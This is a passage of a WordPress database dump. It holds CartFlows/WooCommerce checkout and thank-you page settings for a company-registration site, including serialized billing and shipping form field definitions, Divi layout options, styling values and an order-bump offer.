el\";s:10:\"First name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:14:\"form-row-first\";}s:12:\"autocomplete\";s:10:\"given-name\";s:8:\"priority\";i:10;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:17:\"billing_last_name\";a:8:{s:5:\"label\";s:9:\"Last name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:13:\"form-row-last\";}s:12:\"autocomplete\";s:11:\"family-name\";s:8:\"priority\";i:20;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:15:\"billing_company\";a:8:{s:5:\"label\";s:12:\"Company name\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:12:\"autocomplete\";s:12:\"organization\";s:8:\"priority\";i:30;s:8:\"required\";b:0;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:15:\"billing_country\";a:9:{s:4:\"type\";s:7:\"country\";s:5:\"label\";s:7:\"Country\";s:8:\"required\";b:1;s:5:\"class\";a:3:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";i:2;s:23:\"update_totals_on_change\";}s:12:\"autocomplete\";s:7:\"country\";s:8:\"priority\";i:40;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:17:\"billing_address_1\";a:8:{s:5:\"label\";s:14:\"Street address\";s:11:\"placeholder\";s:28:\"House number and street name\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line1\";s:8:\"priority\";i:50;s:7:\"default\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:17:\"billing_address_2\";a:9:{s:5:\"label\";s:27:\"Apartment, suite, unit etc.\";s:11:\"label_class\";a:1:{i:0;s:18:\"screen-reader-text\";}s:11:\"placeholder\";s:38:\"Apartment, suite, unit etc. (optional)\";s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line2\";s:8:\"priority\";i:60;s:8:\"required\";b:0;s:7:\"default\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:12:\"billing_city\";a:8:{s:5:\"label\";s:11:\"Town / City\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:14:\"address-level2\";s:8:\"priority\";i:70;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:13:\"billing_state\";a:11:{s:4:\"type\";s:5:\"state\";s:5:\"label\";s:5:\"State\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:5:\"state\";}s:12:\"autocomplete\";s:14:\"address-level1\";s:8:\"priority\";i:80;s:13:\"country_field\";s:15:\"billing_country\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:16:\"billing_postcode\";a:9:{s:5:\"label\";s:3:\"ZIP\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:8:\"postcode\";}s:12:\"autocomplete\";s:11:\"postal-code\";s:8:\"priority\";i:90;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:13:\"billing_phone\";a:10:{s:5:\"label\";s:5:\"Phone\";s:8:\"required\";b:1;s:4:\"type\";s:3:\"tel\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:8:\"validate\";a:1:{i:0;s:5:\"phone\";}s:12:\"autocomplete\";s:3:\"tel\";s:8:\"priority\";i:100;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:13:\"billing_email\";a:10:{s:5:\"label\";s:13:\"Email address\";s:8:\"required\";b:1;s:4:\"type\";s:5:\"email\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:8:\"validate\";a:1:{i:0;s:5:\"email\";}s:12:\"autocomplete\";s:14:\"email username\";s:8:\"priority\";i:110;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}}'),(19845,33131,'wcf_field_order_shipping','a:9:{s:19:\"shipping_first_name\";a:7:{s:5:\"label\";s:10:\"First name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:14:\"form-row-first\";}s:12:\"autocomplete\";s:10:\"given-name\";s:8:\"priority\";i:10;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}s:18:\"shipping_last_name\";a:7:{s:5:\"label\";s:9:\"Last name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:13:\"form-row-last\";}s:12:\"autocomplete\";s:11:\"family-name\";s:8:\"priority\";i:20;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}s:16:\"shipping_company\";a:7:{s:5:\"label\";s:12:\"Company name\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:12:\"autocomplete\";s:12:\"organization\";s:8:\"priority\";i:30;s:8:\"required\";b:0;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}s:16:\"shipping_country\";a:8:{s:4:\"type\";s:7:\"country\";s:5:\"label\";s:7:\"Country\";s:8:\"required\";b:1;s:5:\"class\";a:3:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";i:2;s:23:\"update_totals_on_change\";}s:12:\"autocomplete\";s:7:\"country\";s:8:\"priority\";i:40;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}s:18:\"shipping_address_1\";a:7:{s:5:\"label\";s:14:\"Street address\";s:11:\"placeholder\";s:28:\"House number and street name\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line1\";s:8:\"priority\";i:50;s:7:\"default\";s:0:\"\";}s:18:\"shipping_address_2\";a:8:{s:5:\"label\";s:27:\"Apartment, suite, unit etc.\";s:11:\"label_class\";a:1:{i:0;s:18:\"screen-reader-text\";}s:11:\"placeholder\";s:38:\"Apartment, suite, unit etc. (optional)\";s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line2\";s:8:\"priority\";i:60;s:8:\"required\";b:0;s:7:\"default\";s:0:\"\";}s:13:\"shipping_city\";a:7:{s:5:\"label\";s:11:\"Town / City\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:14:\"address-level2\";s:8:\"priority\";i:70;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}s:14:\"shipping_state\";a:10:{s:4:\"type\";s:5:\"state\";s:5:\"label\";s:5:\"State\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:5:\"state\";}s:12:\"autocomplete\";s:14:\"address-level1\";s:8:\"priority\";i:80;s:13:\"country_field\";s:16:\"shipping_country\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}s:17:\"shipping_postcode\";a:8:{s:5:\"label\";s:3:\"ZIP\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:8:\"postcode\";}s:12:\"autocomplete\";s:11:\"postal-code\";s:8:\"priority\";i:90;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}}'),(19846,33131,'wcf-checkout-box-note','yes'),(19847,33131,'wcf-checkout-box-note-text','Get Your FREE copy of CartFlows in just few steps.'),(19848,33131,'wcf-checkout-box-note-text-color',''),(19849,33131,'wcf-checkout-box-note-bg-color',''),(19850,33131,'wcf-checkout-step-one-title','Shipping'),(19851,33131,'wcf-checkout-step-one-sub-title','Where to ship it?'),(19852,33131,'wcf-checkout-step-two-title','Payment'),(19853,33131,'wcf-checkout-step-two-sub-title','Of your order'),(19854,33131,'wcf-checkout-offer-button-title','For Special Offer Click Here'),(19855,33131,'wcf-checkout-offer-button-sub-title','Yes! I want this offer!'),(19856,33131,'wcf-checkout-two-step-section-width','500'),(19857,33131,'wcf-checkout-two-step-section-border','solid'),(19858,33131,'wcf-field-width_billing_first_name','50'),(19859,33131,'wcf-field-width_billing_last_name','50'),(19860,33131,'wcf-field-width_billing_company','100'),(19861,33131,'wcf-field-width_billing_country','100'),(19862,33131,'wcf-field-width_billing_address_1','50'),(19863,33131,'wcf-field-width_billing_address_2','50'),(19864,33131,'wcf-field-width_billing_city','33'),(19865,33131,'wcf-field-width_billing_state','33'),(19866,33131,'wcf-field-width_billing_postcode','33'),(19867,33131,'wcf-field-width_billing_phone','100'),(19868,33131,'wcf-field-width_billing_email','100'),(19869,33131,'wcf-field-width_shipping_first_name','50'),(19870,33131,'wcf-field-width_shipping_last_name','50'),(19871,33131,'wcf-field-width_shipping_company','100'),(19872,33131,'wcf-field-width_shipping_country','100'),(19873,33131,'wcf-field-width_shipping_address_1','50'),(19874,33131,'wcf-field-width_shipping_address_2','50'),(19875,33131,'wcf-field-width_shipping_city','33'),(19876,33131,'wcf-field-width_shipping_state','33'),(19877,33131,'wcf-field-width_shipping_postcode','33'),(19878,33131,'_edit_lock','1563906079:1'),(19879,33131,'_et_pb_enable_shortcode_tracking',''),(19880,33131,'wcf-flow-id','33130'),(19881,33131,'wcf-step-type','checkout'),(19882,33131,'_et_pb_custom_css',''),(19883,33131,'_et_pb_gutter_width','3'),(19884,33131,'_et_pb_ab_subjects',''),(19885,33131,'_et_pb_old_content',''),(19886,33131,'_edit_last','1'),(19887,33131,'_et_pb_first_image',''),(19888,33131,'_et_pb_truncate_post',''),(19889,33132,'cartflows_imported_step','yes'),(19890,33132,'_wp_page_template','cartflows-canvas'),(19891,33132,'_et_pb_post_hide_nav','default'),(19892,33132,'_et_pb_page_layout','et_right_sidebar'),(19893,33132,'_et_pb_side_nav','off'),(19894,33132,'_et_pb_use_builder','on'),(19895,33132,'wcf-field-google-font-url','//fonts.googleapis.com/css?family=Poppins|Poppins:600'),(19896,33132,'wcf-active-tab','wcf-thankyou-fields'),(19897,33132,'wcf-tq-advance-options-fields','yes'),(19898,33132,'wcf-show-overview-section','yes'),(19899,33132,'wcf-show-details-section','yes'),(19900,33132,'wcf-show-billing-section','no'),(19901,33132,'wcf-show-shipping-section','no'),(19902,33132,'_et_pb_show_page_creation','off'),(19903,33132,'_et_pb_built_for_post_type','page'),(19904,33132,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"31390\" /]'),(19905,33132,'_thumbnail_id','4632'),(19906,33132,'_et_builder_version','BB|Divi|3.26.3'),(19907,33132,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:3:{i:0;s:5:\"latin\";i:2;s:10:\"devanagari\";i:3;s:9:\"latin-ext\";}}'),(19908,33132,'wcf-tq-font-family','\'Poppins\', sans-serif'),(19909,33132,'wcf-tq-heading-font-family','\'Poppins\', sans-serif'),(19910,33132,'wcf-tq-heading-font-wt','600'),(19911,33132,'wcf-tq-container-width','750'),(19912,33132,'wcf-tq-section-bg-color','#f1f1f1'),(19913,33132,'enable-to-import','1'),(19914,33132,'_uabb_lite_converted','yes'),(19915,33132,'site-sidebar-layout','default'),(19916,33132,'site-content-layout','default'),(19917,33132,'theme-transparent-header-meta','default'),(19918,33132,'_edit_last','1'),(19919,33132,'_et_pb_first_image',''),(19920,33132,'_et_pb_truncate_post',''),(19921,33132,'_edit_lock','1563902778:1'),(19922,33132,'wcf-tq-heading-color',''),(19923,33132,'_et_pb_ab_stats_refresh_interval','hourly'),(19924,33132,'_et_pb_old_content',''),(19925,33132,'_et_pb_enable_shortcode_tracking',''),(19926,33132,'_et_pb_custom_css',''),(19927,33132,'_et_pb_gutter_width','3'),(19928,33132,'wcf-tq-text-color',''),(19929,33132,'wcf-flow-id','33130'),(19930,33132,'wcf-step-type','thankyou'),(19931,33132,'wcf-custom-script',''),(19932,33134,'_edit_lock','1566666137:1'),(19933,33134,'_edit_last','1'),(19934,33134,'wcf-testing','no'),(19935,33134,'wcf-steps','a:2:{i:0;a:3:{s:2:\"id\";i:33135;s:5:\"title\";s:32:\"SA Company Registration Checkout\";s:4:\"type\";s:8:\"checkout\";}i:1;a:3:{s:2:\"id\";i:33136;s:5:\"title\";s:15:\"Thank You CoReg\";s:4:\"type\";s:8:\"thankyou\";}}'),(19937,33135,'site-sidebar-layout','default'),(19938,33135,'site-content-layout','default'),(19936,33134,'cartflows_imported_flow','yes'),(19939,33135,'theme-transparent-header-meta','default'),(19940,33135,'_uabb_lite_converted','yes'),(19941,33135,'enable-to-import','1'),(19942,33135,'_et_pb_dark_text_color','#7a7a7a'),(19943,33135,'_et_pb_built_for_post_type','page'),(19944,33135,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"33135\" /]'),(19945,33135,'_thumbnail_id','6328'),(19946,33135,'_et_builder_version','BB|Divi|3.27.3'),(19947,33135,'_et_pb_show_page_creation','off'),(19948,33135,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:4:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";s:12:\"et-gf-roboto\";s:91:\"Roboto:100,100italic,300,300italic,regular,italic,500,500italic,700,700italic,900,900italic\";}s:6:\"subset\";a:8:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"devanagari\";i:4;s:8:\"cyrillic\";i:5;s:5:\"greek\";i:6;s:9:\"greek-ext\";i:7;s:12:\"cyrillic-ext\";}}'),(19949,33135,'wcf-shipping_city','no'),(19950,33135,'wcf-shipping_state','no'),(19951,33135,'wcf-shipping_postcode','no'),(19952,33135,'wcf-shipping_country','no'),(19953,33135,'wcf-shipping_address_1','no'),(19954,33135,'wcf-shipping_address_2','no'),(19955,33135,'wcf-bump-border-color','#ff4800'),(19956,33135,'wcf-bump-border-style','inherit'),(19957,33135,'wcf-bump-bg-color','#ffffff'),(19958,33135,'wcf-show-coupon-field','no'),(19959,33135,'wcf-checkout-additional-fields','no'),(19960,33135,'wcf-custom-checkout-fields','yes'),(19961,33135,'wcf-shipto-diff-addr-fields','no'),(19962,33135,'wcf-billing_first_name','yes'),(19963,33135,'wcf-billing_last_name','yes'),(19964,33135,'wcf-billing_company','no'),(19965,33135,'wcf-billing_country','no'),(19966,33135,'wcf-billing_address_1','no'),(19967,33135,'wcf-billing_address_2','no'),(19968,33135,'wcf-billing_city','no'),(19969,33135,'wcf-billing_state','no'),(19970,33135,'wcf-billing_postcode','no'),(19971,33135,'wcf-billing_phone','yes'),(19972,33135,'wcf-billing_email','yes'),(19973,33135,'wcf-shipping_first_name','no'),(19974,33135,'wcf-shipping_last_name','no'),(19975,33135,'wcf-shipping_company','no'),(19976,33135,'wcf-order-bump-desc','S50(1) Every company must-\r\n(a)establish or cause to be established a register of its issued securities in the prescribed form; and\r\n(b)maintain its securities register in accordance with the prescribed standards.'),(19977,33135,'wcf-order-bump-position','after-order'),(19978,33135,'wcf-order-bump-label','Yes, I will take it! For R75'),(19979,33135,'wcf-order-bump-hl-text','Company Law Requirement'),(19980,33135,'wcf-submit-color','#ffffff'),(19981,33135,'wcf-submit-hover-color','#ffffff'),(19982,33135,'wcf-submit-bg-color','#242f6b'),(19983,33135,'wcf-submit-bg-hover-color','#242f6b'),(19984,33135,'wcf-submit-border-color','#242f6b'),(19985,33135,'wcf-submit-border-hover-color','#242f6b'),(19986,33135,'wcf-active-tab','wcf-pre-checkout-offer'),(19987,33135,'wcf-enable-product-options','no'),(19988,33135,'wcf-product-options','force-all'),(19989,33135,'wcf-enable-product-variation','no'),(19990,33135,'wcf-product-variation-options','inline'),(19991,33135,'wcf-enable-product-quantity','no'),(19992,33135,'wcf-order-bump-style','style-2'),(19993,33135,'wcf-order-bump','yes'),(19994,33135,'wcf-field-label-color','#404040'),(19995,33135,'wcf-input-button-size','33px'),(19996,33135,'wcf-input-field-size','33px'),(19997,33135,'wcf-field-color','#555555'),(19998,33135,'wcf-field-bg-color','#ffffff'),(19999,33135,'wcf-field-border-color','#d4d4d4'),(20000,33135,'wcf-input-font-weight','100'),(20001,33135,'wcf-heading-font-family','\'Roboto\', sans-serif'),(20002,33135,'wcf-heading-font-weight','100'),(20003,33135,'wcf-base-font-family','\'Roboto\', sans-serif'),(20004,33135,'wcf-advance-options-fields','no'),(20005,33135,'wcf-button-font-family','\'Roboto\', sans-serif'),(20006,33135,'wcf-button-font-weight','100'),(20007,33135,'wcf-primary-color','#242f6b'),(20008,33135,'wcf-heading-color','#404040'),(20009,33135,'wcf-fields-skins','style-one'),(20010,33135,'wcf-checkout-layout','one-column'),(20011,33135,'wcf-input-font-family','\'Roboto\', sans-serif'),(20012,33135,'_wp_page_template','cartflows-canvas'),(20013,33135,'_et_pb_post_hide_nav','default'),(20014,33135,'_et_pb_page_layout','et_right_sidebar'),(20015,33135,'wcf-field-google-font-url','//fonts.googleapis.com/css?family=Roboto|Roboto:100|Roboto:100|Roboto:100'),(20016,33135,'_et_pb_side_nav','off'),(20017,33135,'_et_pb_use_builder','on'),(20018,33135,'wcf_fields_shipping','a:9:{s:19:\"shipping_first_name\";a:5:{s:5:\"label\";s:10:\"First name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:14:\"form-row-first\";}s:12:\"autocomplete\";s:10:\"given-name\";s:8:\"priority\";i:10;}s:18:\"shipping_last_name\";a:5:{s:5:\"label\";s:9:\"Last name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:13:\"form-row-last\";}s:12:\"autocomplete\";s:11:\"family-name\";s:8:\"priority\";i:20;}s:16:\"shipping_company\";a:5:{s:5:\"label\";s:12:\"Company name\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:12:\"autocomplete\";s:12:\"organization\";s:8:\"priority\";i:30;s:8:\"required\";b:0;}s:16:\"shipping_country\";a:6:{s:4:\"type\";s:7:\"country\";s:5:\"label\";s:7:\"Country\";s:8:\"required\";b:1;s:5:\"class\";a:3:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";i:2;s:23:\"update_totals_on_change\";}s:12:\"autocomplete\";s:7:\"country\";s:8:\"priority\";i:40;}s:18:\"shipping_address_1\";a:6:{s:5:\"label\";s:14:\"Street address\";s:11:\"placeholder\";s:28:\"House number and street name\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line1\";s:8:\"priority\";i:50;}s:18:\"shipping_address_2\";a:7:{s:5:\"label\";s:27:\"Apartment, suite, unit etc.\";s:11:\"label_class\";a:1:{i:0;s:18:\"screen-reader-text\";}s:11:\"placeholder\";s:38:\"Apartment, suite, unit etc. (optional)\";s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line2\";s:8:\"priority\";i:60;s:8:\"required\";b:0;}s:13:\"shipping_city\";a:5:{s:5:\"label\";s:11:\"Town / City\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:14:\"address-level2\";s:8:\"priority\";i:70;}s:14:\"shipping_state\";a:8:{s:4:\"type\";s:5:\"state\";s:5:\"label\";s:5:\"State\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:5:\"state\";}s:12:\"autocomplete\";s:14:\"address-level1\";s:8:\"priority\";i:80;s:13:\"country_field\";s:16:\"shipping_country\";}s:17:\"shipping_postcode\";a:6:{s:5:\"label\";s:3:\"ZIP\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:8:\"postcode\";}s:12:\"autocomplete\";s:11:\"postal-code\";s:8:\"priority\";i:90;}}'),(20019,33135,'wcf-header-logo-image',''),(20020,33135,'wcf-header-logo-width',''),(20021,33135,'wcf-custom-script',''),(20022,33135,'wcf-product-opt-title','Your Products'),(20023,33135,'wcf-checkout-discount-coupon','a:1:{i:0;s:9:\"regmeless\";}'),(20024,33135,'wcf-order-bump-image','https://companyregistration.online/wp-content/uploads/2019/07/company-register-1.gif'),(20025,33135,'cartflows_imported_step','yes'),(20026,33135,'wcf_fields_billing','a:11:{s:18:\"billing_first_name\";a:5:{s:5:\"label\";s:10:\"First name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:14:\"form-row-first\";}s:12:\"autocomplete\";s:10:\"given-name\";s:8:\"priority\";i:10;}s:17:\"billing_last_name\";a:5:{s:5:\"label\";s:9:\"Last name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:13:\"form-row-last\";}s:12:\"autocomplete\";s:11:\"family-name\";s:8:\"priority\";i:20;}s:15:\"billing_company\";a:5:{s:5:\"label\";s:12:\"Company name\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:12:\"autocomplete\";s:12:\"organization\";s:8:\"priority\";i:30;s:8:\"required\";b:0;}s:15:\"billing_country\";a:6:{s:4:\"type\";s:7:\"country\";s:5:\"label\";s:7:\"Country\";s:8:\"required\";b:1;s:5:\"class\";a:3:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";i:2;s:23:\"update_totals_on_change\";}s:12:\"autocomplete\";s:7:\"country\";s:8:\"priority\";i:40;}s:17:\"billing_address_1\";a:6:{s:5:\"label\";s:14:\"Street address\";s:11:\"placeholder\";s:28:\"House number and street name\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line1\";s:8:\"priority\";i:50;}s:17:\"billing_address_2\";a:7:{s:5:\"label\";s:27:\"Apartment, suite, unit etc.\";s:11:\"label_class\";a:1:{i:0;s:18:\"screen-reader-text\";}s:11:\"placeholder\";s:38:\"Apartment, suite, unit etc. (optional)\";s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line2\";s:8:\"priority\";i:60;s:8:\"required\";b:0;}s:12:\"billing_city\";a:5:{s:5:\"label\";s:11:\"Town / City\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:14:\"address-level2\";s:8:\"priority\";i:70;}s:13:\"billing_state\";a:8:{s:4:\"type\";s:5:\"state\";s:5:\"label\";s:5:\"State\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:5:\"state\";}s:12:\"autocomplete\";s:14:\"address-level1\";s:8:\"priority\";i:80;s:13:\"country_field\";s:15:\"billing_country\";}s:16:\"billing_postcode\";a:6:{s:5:\"label\";s:3:\"ZIP\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:8:\"postcode\";}s:12:\"autocomplete\";s:11:\"postal-code\";s:8:\"priority\";i:90;}s:13:\"billing_phone\";a:7:{s:5:\"label\";s:5:\"Phone\";s:8:\"required\";b:1;s:4:\"type\";s:3:\"tel\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:8:\"validate\";a:1:{i:0;s:5:\"phone\";}s:12:\"autocomplete\";s:3:\"tel\";s:8:\"priority\";i:100;}s:13:\"billing_email\";a:7:{s:5:\"label\";s:13:\"Email address\";s:8:\"required\";b:1;s:4:\"type\";s:5:\"email\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:8:\"validate\";a:1:{i:0;s:5:\"email\";}s:12:\"autocomplete\";s:14:\"email username\";s:8:\"priority\";i:110;}}'),(20027,33135,'wcf-checkout-products','a:1:{i:0;a:1:{s:7:\"product\";s:2:\"28\";}}'),(20028,33135,'wcf-base-font-weight',NULL),(20029,33135,'wcf-section-bg-color',NULL),(20030,33135,'wcf-hl-bg-color',''),(20031,33135,'wcf-field-tb-padding',''),(20032,33135,'wcf-field-lr-padding',''),(20033,33135,'wcf-box-border-color',NULL),(20034,33135,'wcf-submit-tb-padding',''),(20035,33135,'wcf-submit-lr-padding',''),(20036,33135,'wcf-order-bump-product','a:1:{i:0;s:5:\"31327\";}'),(20037,33135,'wcf-order-bump-discount',''),(20038,33135,'wcf-order-bump-discount-value',''),(20039,33135,'wcf-bump-label-color',''),(20040,33135,'wcf-bump-label-bg-color',''),(20041,33135,'wcf-bump-desc-text-color',''),(20042,33135,'wcf-bump-hl-text-color',''),(20043,33135,'wcf-bump-hl-bg-color',NULL),(20044,33135,'wcf-bump-hl-tb-padding',NULL),(20045,33135,'wcf-bump-hl-lr-padding',NULL),(20046,33135,'wcf_field_order_billing','a:11:{s:18:\"billing_first_name\";a:8:{s:5:\"label\";s:10:\"First name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:14:\"form-row-first\";}s:12:\"autocomplete\";s:10:\"given-name\";s:8:\"priority\";i:10;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:17:\"billing_last_name\";a:8:{s:5:\"label\";s:9:\"Last name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:13:\"form-row-last\";}s:12:\"autocomplete\";s:11:\"family-name\";s:8:\"priority\";i:20;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:15:\"billing_company\";a:8:{s:5:\"label\";s:12:\"Company name\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:12:\"autocomplete\";s:12:\"organization\";s:8:\"priority\";i:30;s:8:\"required\";b:0;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:15:\"billing_country\";a:9:{s:4:\"type\";s:7:\"country\";s:5:\"label\";s:7:\"Country\";s:8:\"required\";b:1;s:5:\"class\";a:3:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";i:2;s:23:\"update_totals_on_change\";}s:12:\"autocomplete\";s:7:\"country\";s:8:\"priority\";i:40;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:17:\"billing_address_1\";a:8:{s:5:\"label\";s:14:\"Street address\";s:11:\"placeholder\";s:28:\"House number and street name\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line1\";s:8:\"priority\";i:50;s:7:\"default\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:17:\"billing_address_2\";a:9:{s:5:\"label\";s:27:\"Apartment, suite, unit etc.\";s:11:\"label_class\";a:1:{i:0;s:18:\"screen-reader-text\";}s:11:\"placeholder\";s:38:\"Apartment, suite, unit etc. (optional)\";s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line2\";s:8:\"priority\";i:60;s:8:\"required\";b:0;s:7:\"default\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:12:\"billing_city\";a:8:{s:5:\"label\";s:11:\"Town / 